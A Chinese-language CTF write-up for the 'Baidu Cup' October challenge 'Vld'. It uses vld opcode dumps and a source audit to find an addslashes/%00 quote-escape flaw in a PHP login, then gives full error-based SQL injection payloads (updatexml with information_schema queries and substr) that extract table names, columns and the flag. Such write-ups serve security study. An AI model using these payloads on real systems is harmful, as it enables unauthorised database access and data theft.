“百度杯”CTF比赛 十月场--Vld

知识点：

· vld 查看opcode

· 代码审计

· 报错注入

 

vld是PECL（PHP 扩展和应用仓库）的一个PHP扩展，现在最新版本是 0.14.0（2016-12-18），它的作用是：显示转储PHP脚本（opcode）的内部表示（来自PECL的vld简介）。简单来说，可以查看PHP程序的opcode。

 

查看源代码

访问 index.php.txt

有三个get参数flag1、flag2、flag3分别对应三个字符串，同时get这三个参数

/index.php?flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi

得到：

访问 1chunqiu.zip，下载到了一份网站源码

进行代码审计，

dbmysql.class.php 

stripcslashes() 函数删除由 addcslashes() 函数添加的反斜杠。

addcslashes() 函数返回在指定字符前添加反斜杠的字符串（对大小写敏感）。addcslashes(string,characters)string:需要转义的字符串 characters:要转义的字符或字符范围

login.php

is_numeric() 函数用于检测变量是否为数字或数字字符串。bool is_numeric ( mixed $var )    $var：要检测的变量。

trim()函数移除字符串两侧的空白字符或其他预定义字符。trim(string,charlist)

 

首先判断number是否为数字，将username中与number相同的字符替换为空，username还进行了safe_data()函数的处理

addslashes()会将%00转义为\0，单引号也会被转义。我们让username为test%00'，经过safe_data()会变成test\0\'，然后让number值为0，username中的0被替换为空，最后username=test\\'，这样转义单引号的反斜杠被前一个转义，导致后面的单引号逃逸，成功闭合前面语句，可以进行注入

我们在这个位置进行SQL报错注入，BP抓包进行修改

number=0&username=test%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)#&password=123&submit=%E6%8F%90%E4%BA%A4

得到flag,users1两个表

 

number=0&username=test%00' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database()),1),1)#&password=123&submit=%E6%8F%90%E4%BA%A4

得到列名

查询flag表中flag列的字段内容

（因为updatexml报错只显示32位，所以用substr分割显示flag）

number=0&username=test%00' and updatexml(1,concat(1,(select substr(flag,1,32) from flag),1),1)#&password=123&submit=%E6%8F%90%E4%BA%A4

number=0&username=test%00' and updatexml(1,concat(1,(select substr(flag,15,32) from flag),1),1)#&password=123&submit=%E6%8F%90%E4%BA%A4

拼接得到：flag{40362828-f283-4021-867e-d91833d7d461}